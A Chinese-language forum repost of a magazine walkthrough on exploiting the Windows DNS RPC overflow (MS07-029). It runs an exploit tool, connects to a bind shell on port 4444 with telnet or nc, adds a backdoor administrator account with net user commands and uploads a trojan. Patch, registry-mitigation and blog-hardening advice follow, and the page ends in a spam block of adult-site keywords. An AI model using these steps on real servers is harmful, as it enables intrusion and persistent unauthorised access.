返回列表 回復 發帖

如何利用dns漏洞入侵

DNS 是功能變數名稱系統 (Domain Name System) 的縮寫。大家在上網輸入網址時,只有通過功能變數名稱解析系統解析找到相對應的IP地址才能訪問到網站。但是最近微軟的Windows 2000和Windows 2003的DNS服務出現了一個級別極高的安全漏洞,如果被駭客成功利用的話,那麼我們的上網操作將遇到巨大的麻煩。
  駭客姓名:張均誠
  駭客特長:Windows系統漏洞研究
  使用工具:DNS伺服器漏洞利用工具
  駭客自白:最近Windows系統的DNS出現了0day漏洞,自從這個安全漏洞的代碼被披露,攻擊這個漏洞的Nirbot蠕蟲已經出現了各種變體。如果這個漏洞被駭客利用,那麼系統就會被駭客完全控制。
DNS漏洞打開系統防線
  Windows DNS如果存在這個漏洞,那麼它在工作時,RPC介面如果處理到有非常規的畸形連接請求,就會向外釋放管理員許可權,讓駭客可以利用這種漏洞完全控制系統。駭客可以通過向有這個漏洞的系統發送一個經過特別設計的RPC數據包,就能夠獲得該系統的管理員許可權,遠程執行任何指令。
小知識:什麼是RPC
  遠程過程調用 (RPC) 是一種協議,程式可使用這種協議向網路中的另一臺電腦上的程式請求服務。由於使用 RPC 的程式不必瞭解支持通信的網路協議的情況,因此 RPC 提高了程式的互操作性。
  此前,RPC中也出現過數個漏洞,其中包括導致Blaster蠕蟲大爆發的那個漏洞。這一最新的漏洞是一個堆疊溢出漏洞,給微軟和Windows用戶帶來了很大麻煩。
  根據微軟發佈的消息,Windows XP和Windows Vista不會受到這一DNS漏洞的影響,Windows 2000 Server SP4、Windows Server 2003 SP1、Windows Server 2003 SP2則存在這一漏洞。
輕鬆利用DNS漏洞
  打開系統的命令提示符,接著跳轉到DNS伺服器漏洞利用工具所在的命令,然後執行該漏洞利用工具(圖1)。

  在該漏洞的利用程式中執行命令:dns.exe -h 127.0.0.1 -t 1 -p 445,因為我是在本地電腦上進行測試的,所以其中的IP地址為127.0.0.1,而且需要根據伺服器版的語言設置參數。當利用工具提示溢出成功以後,就可以利用telnet命令或程式nc連接存在漏洞的伺服器中的4444端口,比如telnet 127.0.0.1 4444(圖2)。需要說明的是,該工具的成功率並不是特別的高,所以在測試的時候需要多進行幾次。
  當我們成功利用漏洞進行溢出以後,就可以在命令行輸入:net user pcw 1234 /add,回車確定後如果顯示命令成功,就說明已經成功添加了一個用戶名為pcw、密碼為1234的用戶。
  然後我們再在命令行輸入:net localgroup administrators pcw /add,如果成功執行的話,就表示將該用戶已經添加到管理員組(圖3)。

  現在只要利用Windows系統自帶的遠程桌面功能,接著連接到該DNS伺服器的IP地址,然後利用我們剛剛創建的用戶名進行登錄,就可以進行適時遠程管理操作了(圖4)。

  如果遠程伺服器沒有開通終端服務功能,也可以通過溢出得到的命令提示符窗口,用FTP或Tftp命令上傳我們的木馬程式,這樣也可以進行有效的遠程管理操作。
漏洞危害大,不可不防
  由於這個安全漏洞影響到Windows 2000 Server和Windows Server 2003伺服器軟體,而且每一種語言版本的Windows伺服器都要有一個補丁。微軟提供的補丁地址為:http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx,請根據自己的情況選擇對應的補丁。
  同時,建議管理員採取如下措施以降低威脅程度。首先打開註冊表編輯器,找到以下註冊表位置HKEY_LOCAL_MACH INESYSTEMCurrentControlSetServices DNSParameters,通過右鍵菜單新建一個名為“RpcProtocol”的DWORD專案,然後雙擊新建的值並將該值的數據更改為4,最後重啟DNS服務更改生效即可。
破解第20期《輕鬆拿下OBlog博客系統》攻擊招數
  本周,一共有200位讀者發來了破解第20期《輕鬆拿下OBlog博客系統》的招數。我們根據大家的破招描述和效果,最後評出來自廣州的李國森為最佳防禦者,他將獲得50元的獎勵,同時,還可再參加年度最佳防禦者的評選。
別碰我的博客
  1. 根據OBlog系統提示安裝漏洞補丁,注意事項查看http://www.oblog.cn/oblog/Oblogshow.htm。
  2. 更改js.asp的檔案名,但其他頁面的相應連接也會變成新檔案名,還可以備份一個假的js.asp和數據庫。
  3. 更換管理員頁面的名字與位置。這是一個基本方法,但很管用。當然,網站不能設置成支持目錄流覽。
  4. 把管理密碼設得儘量複雜,位數也更長一點,且沒什麼意義最好,這樣MD5破解網站的資料庫時就不可能組合出你的密碼。
返回列表
豆豆聊天網|交友聊天網|柔情聊天網|ut聊天網|聊天網|性感帶|女人性感帶|性感美女|性感影片|性感辣妹|85街|85街成人片觀看|85街免費影片觀看|85街成人片|85街免費影片|寫真集美女圖|2010真情寫真|豆花妹寫真|美女寫真|寫真集|視訊聊天|免費視訊聊天|視訊聊天室|免費視訊聊天室|uthome視訊聊天|愛愛情色網|免費黃色愛情小說|愛情小說線上看|愛情小說酥胸熱吻|黃色愛情小說|素人模特|美少女圖鑑|少女裸睡圖片|日本美少女圖庫|波波美少女|打手搶短片|硬弟弟免費短片|av999 免費短片|av短片|成人短片|情色小說網|情色小說|情色小說線上看|免費情色小說|成人情色小說|免費視訊聊天|免費視訊|173免費視訊|0401免費視訊|免費視訊美女